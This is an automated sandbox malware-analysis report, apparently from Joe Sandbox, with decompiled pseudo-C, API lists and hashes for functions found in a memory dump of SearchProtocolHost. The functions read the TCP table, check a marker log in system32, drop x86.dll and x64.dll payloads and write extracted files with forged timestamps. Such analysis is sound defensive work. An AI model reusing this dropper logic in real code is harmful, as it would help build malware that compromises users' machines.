                                                0x02fa541d
                                                0x02fa5423
                                                0x02fa542b
                                                0x02fa5430
                                                0x02fa5433
                                                0x02fa5435
                                                0x02fa5437
                                                0x02fa543d
                                                0x02fa543f
                                                0x02fa5448
                                                0x02fa544a
                                                0x02fa544a
                                                0x02fa544a
                                                0x02fa5441
                                                0x02fa5441
                                                0x02fa5441
                                                0x02fa544d
                                                0x02fa544d
                                                0x02fa5454
                                                0x00000000
                                                0x02fa5456
                                                0x02fa5456
                                                0x00000000
                                                0x02fa5456
                                                0x02fa5454
                                                0x02fa53ad
                                                0x00000000
                                                0x02fa53ad
                                                0x02fa5362
                                                0x02fa5377
                                                0x02fa537a
                                                0x00000000
                                                0x00000000
                                                0x02fa5380
                                                0x02fa5383
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa5383
                                                0x02fa5367
                                                0x00000000
                                                0x00000000
                                                0x02fa5370
                                                0x00000000
                                                0x00000000
                                                0x02fa5741
                                                0x02fa5747
                                                0x02fa574d
                                                0x02fa5754
                                                0x02fa5757
                                                0x02fa575d
                                                0x02fa5763
                                                0x02fa576b
                                                0x02fa5771
                                                0x00000000
                                                0x02fa5771
                                                0x02fa52b5
                                                0x02fa52c8
                                                0x02fa52ca
                                                0x02fa52d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa5777
                                                0x02fa577d
                                                0x02fa5784
                                                0x02fa578e
                                                0x02fa579b
                                                0x02fa57a1
                                                0x02fa57a3
                                                0x02fa57a9
                                                0x00000000

                                                APIs
                                                • Sleep.KERNELBASE(00001388,93AD1EEA), ref: 02FA5241
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02FA5271
                                                • HeapAlloc.KERNEL32(00000000), ref: 02FA5274
                                                • GetTcpTable.IPHLPAPI(00000000,00000000,00000001), ref: 02FA52A4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02FA52B2
                                                • HeapFree.KERNEL32(00000000), ref: 02FA52B5
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02FA52BF
                                                • HeapAlloc.KERNEL32(00000000), ref: 02FA52C2
                                                • GetTcpTable.IPHLPAPI(00000000,00000018,00000001), ref: 02FA52E2
                                                • GetTickCount.KERNEL32 ref: 02FA55F1
                                                • GetTickCount.KERNEL32 ref: 02FA56F1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02FA577A
                                                • HeapFree.KERNEL32(00000000), ref: 02FA577D
                                                • Sleep.KERNEL32(00001388), ref: 02FA5784
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02FA5798
                                                • HeapAlloc.KERNEL32(00000000), ref: 02FA579B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02FA57B6
                                                • HeapFree.KERNEL32(00000000), ref: 02FA57B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree$CountSleepTableTick
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 4207308331-3742512694
                                                • Opcode ID: 95b779d96688d0c7434a474be4ecf12dca9b4fb8252706d214b2f9fc72daf83d
                                                • Instruction ID: bdd89f85aacc21f37a281d6756d211b3d7f088c111723654ffd9e286e5803a68
                                                • Opcode Fuzzy Hash: 95b779d96688d0c7434a474be4ecf12dca9b4fb8252706d214b2f9fc72daf83d
                                                • Instruction Fuzzy Hash: 90F1A0B0E40319DFEB20DF64CCA4BA9B7B5BB01394F9445D9D64EA7281DB709A88CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAFC10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254filetimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 2fafc10-2fafc2e 124 2fafc30-2fafc32 call 2faf2d0 123->124 125 2fafc37-2fafc46 123->125 124->125 127 2fafc48-2fafc5c call 2fb0a5d 125->127 128 2fafc5f-2fafc62 125->128 129 2fafc6e-2fafc74 128->129 130 2fafc64-2fafc6b call 2faec60 128->130 133 2fafcc9-2fafce1 call 2faf4e0 129->133 134 2fafc76-2fafc7a 129->134 130->129 142 2fafd1b-2fafd21 133->142 143 2fafce3-2fafce5 133->143 137 2fafc7c-2fafc80 134->137 138 2fafcc2-2fafcc7 134->138 137->138 140 2fafc82-2fafc89 137->140 138->133 138->134 140->138 144 2fafc8b-2fafcbf call 2fae7c0 140->144 148 2fafd23-2fafd25 142->148 149 2fafd36-2fafd3e 142->149 145 2fafcfd 143->145 146 2fafce7-2fafce9 143->146 144->138 152 2fafcff-2fafd18 call 2fafb00 call 2fb0a5d 145->152 146->145 151 2fafceb-2fafced 146->151 154 2fafd2b 148->154 155 2fafd27-2fafd29 148->155 150 2fafd40-2fafd4b 149->150 150->150 156 2fafd4d-2fafd4f 150->156 157 2fafcef-2fafcf3 151->157 158 2fafcf5-2fafcfb 151->158 160 2fafd2e-2fafd34 154->160 155->154 155->160 161 2fafd59-2fafd62 156->161 162 2fafd51-2fafd57 156->162 157->145 157->158 158->152 160->148 160->149 165 2faff08-2faff0f call 2fb0e90 161->165 166 2fafd68-2fafd78 161->166 164 2fafd8b-2fafdb1 wsprintfA 162->164 170 2fafdd2-2fafe02 call 2fafb00 CreateFileA 164->170 168 2fafd7a-2fafd7c 166->168 169 2fafdb3-2fafdd0 wsprintfA 166->169 168->169 173 2fafd7e-2fafd80 168->173 169->170 178 2fafe1c-2fafe30 call 2faef10 170->178 179 2fafe04-2fafe19 call 2fb0a5d 170->179 173->164 176 2fafd82-2fafd89 173->176 176->164 176->169 184 2fafe32-2fafe37 call 2fb0ab4 178->184 185 2fafe45-2fafe4f 178->185 188 2fafe3c-2fafe3f 184->188 187 2fafe50-2fafe71 call 2faf090 185->187 191 2fafe73-2fafe75 187->191 192 2fafed7 187->192 188->185 194 2fafea1-2fafeab 191->194 195 2fafe77 191->195 193 2fafee1-2fafeea FindCloseChangeNotification call 2faf2d0 192->193 199 2fafeef-2faff05 call 2fb0a5d 193->199 194->193 197 2fafe79-2fafe92 WriteFile 195->197 198 2fafe94-2fafe9b 195->198 197->198 200 2fafead-2fafeb7 197->200 201 2fafeb9-2fafed5 SetFileTime 198->201 202 2fafe9d-2fafe9f 198->202 200->193 201->193 202->187 202->194
                                                C-Code - Quality: 84%
                                                			E02FAFC10(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v528;
				struct _FILETIME _v544;
				struct _FILETIME _v552;
				struct _FILETIME _v560;
				long _v564;
				char _v828;
				char _v829;
				struct _OVERLAPPED* _v836;
				long _v840;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				signed int _t80;
				char _t81;
				void* _t83;
				signed int _t91;
				void* _t97;
				long _t100;
				signed int _t110;
				void* _t111;
				signed int _t120;
				signed int _t125;
				signed int _t127;
				signed int* _t133;
				signed int _t134;
				void* _t136;
				intOrPtr _t142;
				signed int* _t144;
				signed int* _t145;
				signed int _t148;
				signed int* _t156;
				signed int* _t167;
				signed int* _t174;
				signed int _t175;
				void* _t181;
				signed int _t183;
				signed int* _t184;
				long _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				signed int _t190;
				signed int _t192;
				signed int _t197;
				void* _t198;
				void* _t200;

				_t166 = __edx;
				_t192 = _t197;
				_t198 = _t197 - 0x344;
				_t74 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t74 ^ _t192;
				_t133 = _a8;
				_t174 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					E02FAF2D0( *((intOrPtr*)(__ecx)), __edx);
				}
				_t76 =  *_t174;
				_t142 = _a4;
				_t174[1] = 0xffffffff;
				if(_t142 <  *((intOrPtr*)(_t76 + 4))) {
					__eflags = _t142 -  *((intOrPtr*)(_t76 + 0x10));
					if(_t142 <  *((intOrPtr*)(_t76 + 0x10))) {
						E02FAEC60(_t76);
						_t142 = _a4;
					}
					_t77 =  *_t174;
					_push(_t181);
					__eflags =  *((intOrPtr*)(_t77 + 0x10)) - _t142;
					if( *((intOrPtr*)(_t77 + 0x10)) < _t142) {
						do {
							_t190 =  *_t174;
							__eflags = _t190;
							if(_t190 != 0) {
								__eflags =  *(_t190 + 0x18);
								if( *(_t190 + 0x18) != 0) {
									_t166 =  *((intOrPtr*)(_t190 + 0x10)) + 1;
									__eflags = _t166 -  *((intOrPtr*)(_t190 + 4));
									if(_t166 !=  *((intOrPtr*)(_t190 + 4))) {
										 *((intOrPtr*)(_t190 + 0x10)) = _t166;
										 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x48)) + 0x2e +  *((intOrPtr*)(_t190 + 0x50)) +  *((intOrPtr*)(_t190 + 0x4c));
										_t20 = _t190 + 0x28; // 0x28
										_t166 = _t20;
										_t21 = _t190 + 0x78; // 0x78
										_t125 = E02FAE7C0(_t190, _t20, _t21, 0, 0);
										_t142 = _a4;
										_t198 = _t198 - 0x10 + 0x1c;
										asm("sbb eax, eax");
										_t127 =  ~_t125 + 1;
										__eflags = _t127;
										 *(_t190 + 0x18) = _t127;
									}
								}
							}
							_t120 =  *_t174;
							__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t142;
						} while ( *((intOrPtr*)(_t120 + 0x10)) < _t142);
					}
					E02FAF4E0(_t133, _t174, _t166, _t174, _t142,  &_v828);
					__eflags = _v564 & 0x00000010;
					_t80 =  *_t133;
					if((_v564 & 0x00000010) == 0) {
						_t167 = _t133;
						_t144 = _t133;
						__eflags = _t80;
						while(_t80 != 0) {
							__eflags = _t80 - 0x2f;
							if(_t80 == 0x2f) {
								L23:
								_t32 =  &(_t144[0]); // 0x2fa5105
								_t167 = _t32;
							} else {
								__eflags = _t80 - 0x5c;
								if(_t80 == 0x5c) {
									goto L23;
								}
							}
							_t33 =  &(_t144[0]); // 0x2fd6a4c
							_t80 =  *_t33;
							_t144 =  &(_t144[0]);
							__eflags = _t80;
						}
						_t145 = _t133;
						_t183 =  &_v268 - _t133;
						__eflags = _t183;
						do {
							_t81 =  *_t145;
							_t35 =  &(_t145[0]); // 0x2fd6a4c
							_t145 = _t35;
							 *((char*)(_t183 + _t145 - 1)) = _t81;
							__eflags = _t81;
						} while (_t81 != 0);
						__eflags = _t167 - _t133;
						if(_t167 != _t133) {
							_t83 = _t167 - _t133;
							__eflags = _t83 - 0x104;
							if(_t83 >= 0x104) {
								E02FB0E90();
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t183);
								_t184 = _t145;
								_push(_t174);
								__eflags = _t184[1] - 0xffffffff;
								if(_t184[1] != 0xffffffff) {
									E02FAF2D0( *_t184, _t167);
								}
								_t175 =  *_t184;
								_t184[1] = 0xffffffff;
								__eflags = _t175;
								if(_t175 != 0) {
									__eflags =  *(_t175 + 0x7c);
									if( *(_t175 + 0x7c) != 0) {
										E02FAF2D0(_t175, _t167);
									}
									_push(_t133);
									_t134 =  *_t175;
									__eflags = _t134;
									if(_t134 != 0) {
										__eflags =  *((char*)(_t134 + 0x10));
										if( *((char*)(_t134 + 0x10)) != 0) {
											CloseHandle( *(_t134 + 4));
										}
										_push(0x20);
										E02FB0AA1(_t134);
										_t198 = _t198 + 8;
									}
									L02FB5A36(_t175);
								}
								__eflags = 0;
								 *_t184 = 0;
								return 0;
							} else {
								 *((char*)(_t192 + _t83 - 0x108)) = 0;
								_t91 = _v268;
								__eflags = _t91 - 0x2f;
								if(_t91 == 0x2f) {
									L35:
									wsprintfA( &_v528, "%s%s",  &_v268, _t167);
									_t200 = _t198 + 0x10;
									_t148 = 0;
									__eflags = 0;
								} else {
									__eflags = _t91 - 0x5c;
									if(_t91 == 0x5c) {
										goto L35;
									} else {
										__eflags = _t91;
										if(_t91 == 0) {
											goto L34;
										} else {
											__eflags = _v267 - 0x3a;
											if(_v267 == 0x3a) {
												goto L35;
											} else {
												goto L34;
											}
										}
									}
								}
								goto L36;
							}
						} else {
							_v268 = _t81;
							L34:
							_t183 =  &(_t174[0x50]);
							wsprintfA( &_v528, "%s%s%s", _t183,  &_v268, _t167);
							_t200 = _t198 + 0x14;
							_t148 = _t183;
							L36:
							E02FAFB00(_t148,  &_v268); // executed
							_t97 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0); // executed
							_t136 = _t97;
							__eflags = _t136 - 0xffffffff;
							if(_t136 != 0xffffffff) {
								E02FAEF10( *_t174, _t174[0x4e]); // executed
								__eflags = _t174[0x4f];
								if(__eflags == 0) {
									_push(0x4000); // executed
									_t111 = E02FB0AB4(_t183, __eflags); // executed
									_t200 = _t200 + 4;
									_t174[0x4f] = _t111;
								}
								_v836 = 0;
								while(1) {
									_t170 = _t174[0x4f];
									_t100 = E02FAF090( *_t174, _t174[0x4f], 0x4000,  &_v829); // executed
									_t186 = _t100;
									_t200 = _t200 + 8;
									__eflags = _t186 - 0xffffff96;
									if(_t186 == 0xffffff96) {
										break;
									}
									__eflags = _t186;
									if(__eflags < 0) {
										L47:
										_v836 = 0x5000000;
									} else {
										if(__eflags <= 0) {
											L45:
											__eflags = _v829;
											if(_v829 != 0) {
												SetFileTime(_t136,  &_v552,  &_v560,  &_v544); // executed
											} else {
												__eflags = _t186;
												if(_t186 != 0) {
													continue;
												} else {
													goto L47;
												}
											}
										} else {
											_t110 = WriteFile(_t136, _t174[0x4f], _t186,  &_v840, 0); // executed
											__eflags = _t110;
											if(_t110 == 0) {
												_v836 = 0x400;
											} else {
												goto L45;
											}
										}
									}
									L51:
									FindCloseChangeNotification(_t136); // executed
									E02FAF2D0( *_t174, _t170);
									__eflags = _v8 ^ _t192;
									_pop(_t187);
									return E02FB0A5D(_v8 ^ _t192, _t187);
									goto L64;
								}
								_v836 = 0x1000;
								goto L51;
							} else {
								_pop(_t188);
								__eflags = _v8 ^ _t192;
								return E02FB0A5D(_v8 ^ _t192, _t188);
							}
						}
					} else {
						__eflags = _t80 - 0x2f;
						if(_t80 == 0x2f) {
							L18:
							_t156 = 0;
							__eflags = 0;
						} else {
							__eflags = _t80 - 0x5c;
							if(_t80 == 0x5c) {
								goto L18;
							} else {
								__eflags = _t80;
								if(_t80 == 0) {
									L17:
									_t156 =  &(_t174[0x50]);
								} else {
									__eflags = _t133[0] - 0x3a;
									if(_t133[0] == 0x3a) {
										goto L18;
									} else {
										goto L17;
									}
								}
							}
						}
						E02FAFB00(_t156, _t133);
						_pop(_t189);
						__eflags = _v8 ^ _t192;
						return E02FB0A5D(_v8 ^ _t192, _t189);
					}
				} else {
					return E02FB0A5D(_v8 ^ _t192, _t181);
				}
				L64:
			}























































                                                0x02fafc10
                                                0x02fafc11
                                                0x02fafc13
                                                0x02fafc19
                                                0x02fafc20
                                                0x02fafc24
                                                0x02fafc28
                                                0x02fafc2e
                                                0x02fafc32
                                                0x02fafc32
                                                0x02fafc37
                                                0x02fafc39
                                                0x02fafc3c
                                                0x02fafc46
                                                0x02fafc5f
                                                0x02fafc62
                                                0x02fafc66
                                                0x02fafc6b
                                                0x02fafc6b
                                                0x02fafc6e
                                                0x02fafc70
                                                0x02fafc71
                                                0x02fafc74
                                                0x02fafc76
                                                0x02fafc76
                                                0x02fafc78
                                                0x02fafc7a
                                                0x02fafc7c
                                                0x02fafc80
                                                0x02fafc85
                                                0x02fafc86
                                                0x02fafc89
                                                0x02fafc9c
                                                0x02fafc9f
                                                0x02fafca2
                                                0x02fafca2
                                                0x02fafca7
                                                0x02fafcaf
                                                0x02fafcb4
                                                0x02fafcb7
                                                0x02fafcbc
                                                0x02fafcbe
                                                0x02fafcbe
                                                0x02fafcbf
                                                0x02fafcbf
                                                0x02fafc89
                                                0x02fafc80
                                                0x02fafcc2
                                                0x02fafcc4
                                                0x02fafcc4
                                                0x02fafc76
                                                0x02fafcd3
                                                0x02fafcd8
                                                0x02fafcdf
                                                0x02fafce1
                                                0x02fafd1b
                                                0x02fafd1d
                                                0x02fafd1f
                                                0x02fafd21
                                                0x02fafd23
                                                0x02fafd25
                                                0x02fafd2b
                                                0x02fafd2b
                                                0x02fafd2b
                                                0x02fafd27
                                                0x02fafd27
                                                0x02fafd29
                                                0x00000000
                                                0x00000000
                                                0x02fafd29
                                                0x02fafd2e
                                                0x02fafd2e
                                                0x02fafd31
                                                0x02fafd32
                                                0x02fafd32
                                                0x02fafd3c
                                                0x02fafd3e
                                                0x02fafd3e
                                                0x02fafd40
                                                0x02fafd40
                                                0x02fafd42
                                                0x02fafd42
                                                0x02fafd45
                                                0x02fafd49
                                                0x02fafd49
                                                0x02fafd4d
                                                0x02fafd4f
                                                0x02fafd5b
                                                0x02fafd5d
                                                0x02fafd62
                                                0x02faff08
                                                0x02faff0d
                                                0x02faff0e
                                                0x02faff0f
                                                0x02faff10
                                                0x02faff11
                                                0x02faff13
                                                0x02faff14
                                                0x02faff18
                                                0x02faff1c
                                                0x02faff1c
                                                0x02faff21
                                                0x02faff23
                                                0x02faff2a
                                                0x02faff2c
                                                0x02faff2e
                                                0x02faff32
                                                0x02faff36
                                                0x02faff36
                                                0x02faff3b
                                                0x02faff3c
                                                0x02faff3e
                                                0x02faff40
                                                0x02faff42
                                                0x02faff46
                                                0x02faff4b
                                                0x02faff4b
                                                0x02faff51
                                                0x02faff54
                                                0x02faff59
                                                0x02faff59
                                                0x02faff5d
                                                0x02faff65
                                                0x02faff66
                                                0x02faff69
                                                0x02faff6c
                                                0x02fafd68
                                                0x02fafd68
                                                0x02fafd70
                                                0x02fafd76
                                                0x02fafd78
                                                0x02fafdb3
                                                0x02fafdc7
                                                0x02fafdcd
                                                0x02fafdd0
                                                0x02fafdd0
                                                0x02fafd7a
                                                0x02fafd7a
                                                0x02fafd7c
                                                0x00000000
                                                0x02fafd7e
                                                0x02fafd7e
                                                0x02fafd80
                                                0x00000000
                                                0x02fafd82
                                                0x02fafd82
                                                0x02fafd89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafd89
                                                0x02fafd80
                                                0x02fafd7c
                                                0x00000000
                                                0x02fafd78
                                                0x02fafd51
                                                0x02fafd51
                                                0x02fafd8b
                                                0x02fafd93
                                                0x02fafda6
                                                0x02fafdac
                                                0x02fafdaf
                                                0x02fafdd2
                                                0x02fafdd8
                                                0x02fafdf7
                                                0x02fafdfd
                                                0x02fafdff
                                                0x02fafe02
                                                0x02fafe24
                                                0x02fafe29
                                                0x02fafe30
                                                0x02fafe32
                                                0x02fafe37
                                                0x02fafe3c
                                                0x02fafe3f
                                                0x02fafe3f
                                                0x02fafe45
                                                0x02fafe50
                                                0x02fafe50
                                                0x02fafe64
                                                0x02fafe69
                                                0x02fafe6b
                                                0x02fafe6e
                                                0x02fafe71
                                                0x00000000
                                                0x00000000
                                                0x02fafe73
                                                0x02fafe75
                                                0x02fafea1
                                                0x02fafea1
                                                0x02fafe77
                                                0x02fafe77
                                                0x02fafe94
                                                0x02fafe94
                                                0x02fafe9b
                                                0x02fafecf
                                                0x02fafe9d
                                                0x02fafe9d
                                                0x02fafe9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafe9f
                                                0x02fafe79
                                                0x02fafe8a
                                                0x02fafe90
                                                0x02fafe92
                                                0x02fafead
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafe92
                                                0x02fafe77
                                                0x02fafee1
                                                0x02fafee2
                                                0x02fafeea
                                                0x02fafef8
                                                0x02fafefa
                                                0x02faff05
                                                0x00000000
                                                0x02faff05
                                                0x02fafed7
                                                0x00000000
                                                0x02fafe04
                                                0x02fafe04
                                                0x02fafe0f
                                                0x02fafe19
                                                0x02fafe19
                                                0x02fafe02
                                                0x02fafce3
                                                0x02fafce3
                                                0x02fafce5
                                                0x02fafcfd
                                                0x02fafcfd
                                                0x02fafcfd
                                                0x02fafce7
                                                0x02fafce7
                                                0x02fafce9
                                                0x00000000
                                                0x02fafceb
                                                0x02fafceb
                                                0x02fafced
                                                0x02fafcf5
                                                0x02fafcf5
                                                0x02fafcef
                                                0x02fafcef
                                                0x02fafcf3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fafcf3
                                                0x02fafced
                                                0x02fafce9
                                                0x02fafd01
                                                0x02fafd06
                                                0x02fafd0e
                                                0x02fafd18
                                                0x02fafd18
                                                0x02fafc48
                                                0x02fafc5c
                                                0x02fafc5c
                                                0x00000000

                                                APIs
                                                • wsprintfA.USER32 ref: 02FAFDA6
                                                • wsprintfA.USER32 ref: 02FAFDC7
                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 02FAFDF7
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 02FAFE8A
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 02FAFECF
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02FAFEE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$ChangeCloseCreateFindNotificationTimeWrite
                                                • String ID: %s%s$%s%s%s$:
                                                • API String ID: 2340708895-3034790606
                                                • Opcode ID: 70e0fae62b9d2ca91548b42f5ae7dd9a0e48d8650439c48c6a21f871184c86c2
                                                • Instruction ID: 8a4bad33b67e1a20a6e918354170647e7781c161e6b2584d514d806d1b324d24
                                                • Opcode Fuzzy Hash: 70e0fae62b9d2ca91548b42f5ae7dd9a0e48d8650439c48c6a21f871184c86c2
                                                • Instruction Fuzzy Hash: AB9110B1A002089BCB35DF24CCA4BE9F3B5AF05354F104799DB5A9F681D7726A85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA6FE0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 102fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E02FA6FE0(void* __ebx, CHAR* __ecx, void* __edi) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				void* __esi;
				signed int _t17;
				void* _t23;
				void* _t29;
				void* _t30;
				void* _t42;
				CHAR* _t59;
				signed int _t60;

				_t58 = __edi;
				_t17 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t17 ^ _t60;
				_t59 = __ecx;
				E02FB3440(__edi,  &_v268, 0, 0x104);
				_push("Diagnostics.txt");
				E02FA5180( &_v268, 0x104, "%s\%s", _t59);
				_t23 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t66 = _t23 - 0xffffffff;
				if(_t23 == 0xffffffff) {
					L5:
					__eflags = _v8 ^ _t60;
					return E02FB0A5D(_v8 ^ _t60, _t59);
				} else {
					FindCloseChangeNotification(_t23); // executed
					CreateDirectoryA(_t59, 0); // executed
					_t29 = E02FA7140(_t66,  &_v268); // executed
					_t67 = _t29;
					if(_t29 == 0) {
						goto L5;
					} else {
						_t30 = E02FA5010(__ebx, _t59, _t58, _t67); // executed
						_t68 = _t30;
						if(_t30 == 0) {
							goto L5;
						} else {
							DeleteFileA( &_v268);
							E02FB3440(_t58,  &_v528, 0, 0x104);
							E02FB3440(_t58,  &_v788, 0, 0x104);
							E02FA5180( &_v528, 0x104, "%s\\x86.dll", _t59);
							E02FA5180( &_v788, 0x104, "%s\\x64.dll", _t59);
							_t42 = E02FA7140(_t68,  &_v528);
							_t69 = _t42;
							if(_t42 == 0) {
								goto L5;
							} else {
								E02FA7140(_t69,  &_v788);
								return E02FB0A5D(_v8 ^ _t60, _t59);
							}
						}
					}
				}
			}















                                                0x02fa6fe0
                                                0x02fa6fe9
                                                0x02fa6ff0
                                                0x02fa6fff
                                                0x02fa7004
                                                0x02fa7009
                                                0x02fa7020
                                                0x02fa703c
                                                0x02fa7042
                                                0x02fa7045
                                                0x02fa712d
                                                0x02fa7132
                                                0x02fa713d
                                                0x02fa704b
                                                0x02fa704c
                                                0x02fa7055
                                                0x02fa7067
                                                0x02fa706f
                                                0x02fa7071
                                                0x00000000
                                                0x02fa7077
                                                0x02fa707f
                                                0x02fa7084
                                                0x02fa7086
                                                0x00000000
                                                0x02fa708c
                                                0x02fa7093
                                                0x02fa70a7
                                                0x02fa70ba
                                                0x02fa70d1
                                                0x02fa70e8
                                                0x02fa70f9
                                                0x02fa7101
                                                0x02fa7103
                                                0x00000000
                                                0x02fa7105
                                                0x02fa7111
                                                0x02fa712c
                                                0x02fa712c
                                                0x02fa7103
                                                0x02fa7086
                                                0x02fa7071

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FA703C
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02FA704C
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 02FA7055
                                                • DeleteFileA.KERNEL32(?), ref: 02FA7093
                                                  • Part of subcall function 02FA7140: CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 02FA718D
                                                  • Part of subcall function 02FA7140: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 02FA71A5
                                                  • Part of subcall function 02FA7140: CloseHandle.KERNEL32(00000000,?,?), ref: 02FA71B0
                                                  • Part of subcall function 02FA7140: FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 02FA71BE
                                                  • Part of subcall function 02FA7140: LocalFree.KERNELBASE(00000000,?,?), ref: 02FA71C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreate$ChangeFindNotification$DeleteDirectoryFreeHandleLocalWrite
                                                • String ID: %s\%s$%s\x64.dll$%s\x86.dll$C:\Windows\system32\msvcwme.log$Diagnostics.txt
                                                • API String ID: 3326945587-1068396467
                                                • Opcode ID: 7301b0e229b1277328c79b2b82ff5b3c8bd28afac9457721d05c885c34620c4b
                                                • Instruction ID: de5d893ac106088fa3551f267f93bffe63b4d5f703b15147ed60e2395d96ac26
                                                • Opcode Fuzzy Hash: 7301b0e229b1277328c79b2b82ff5b3c8bd28afac9457721d05c885c34620c4b
                                                • Instruction Fuzzy Hash: 2531B7F0E80318A7FA20F761DD56FDEB36D9F05794F5004E5B799BB1C0DAB0A6848A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA49E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86filememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 2fa49e0-2fa4a0e CreateFileA 236 2fa4a48-2fa4a50 235->236 237 2fa4a10-2fa4a3f GetFileSizeEx LocalAlloc 235->237 238 2fa4a51-2fa4a5e 237->238 239 2fa4a41-2fa4a42 CloseHandle 237->239 240 2fa4a8c-2fa4a8f 238->240 241 2fa4a60-2fa4a7c ReadFile 238->241 239->236 242 2fa4aab-2fa4ab9 FindCloseChangeNotification 240->242 243 2fa4a91-2fa4aaa CloseHandle LocalFree 240->243 244 2fa4a89 241->244 245 2fa4a7e-2fa4a87 241->245 244->240 245->241 245->244
                                                C-Code - Quality: 67%
                                                			E02FA49E0(void** __edx, struct _OVERLAPPED** _a4) {
				void** _v12;
				long _v16;
				long _v20;
				struct _OVERLAPPED* _v28;
				long _v32;
				void* _t15;
				void* _t18;
				long _t19;
				long _t27;
				void* _t29;
				void** _t30;
				struct _OVERLAPPED** _t33;
				long _t34;

				_v12 = __edx;
				_t15 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t29 = _t15;
				if(_t29 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					__imp__GetFileSizeEx(_t29,  &_v32);
					_t34 = _v32;
					_v20 = _t34;
					_t18 = LocalAlloc(0x40, _t34); // executed
					_t30 = _v12;
					 *_t30 = _t18;
					if(_t18 != 0) {
						_t33 = _a4;
						_t19 = _t34;
						 *_t33 = 0;
						if(_t19 > 0) {
							while(1) {
								_v16 = 0;
								ReadFile(_t29,  *_t30, _t34,  &_v16, 0); // executed
								_t27 = _v16;
								if(_t27 == 0) {
									break;
								}
								 *_t33 =  *_t33 + _t27;
								_t34 = _t34 - _t27;
								_t30 = _v12;
								if(_t34 > 0) {
									continue;
								}
								break;
							}
							_t19 = _v20;
						}
						_push(_t29);
						if( *_t33 == _t19) {
							FindCloseChangeNotification(); // executed
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v12);
							return 0; // executed
						}
					} else {
						CloseHandle(_t29);
						goto L3;
					}
				}
			}
















                                                0x02fa4a00
                                                0x02fa4a03
                                                0x02fa4a09
                                                0x02fa4a0e
                                                0x02fa4a48
                                                0x02fa4a50
                                                0x02fa4a10
                                                0x02fa4a13
                                                0x02fa4a1c
                                                0x02fa4a23
                                                0x02fa4a29
                                                0x02fa4a2f
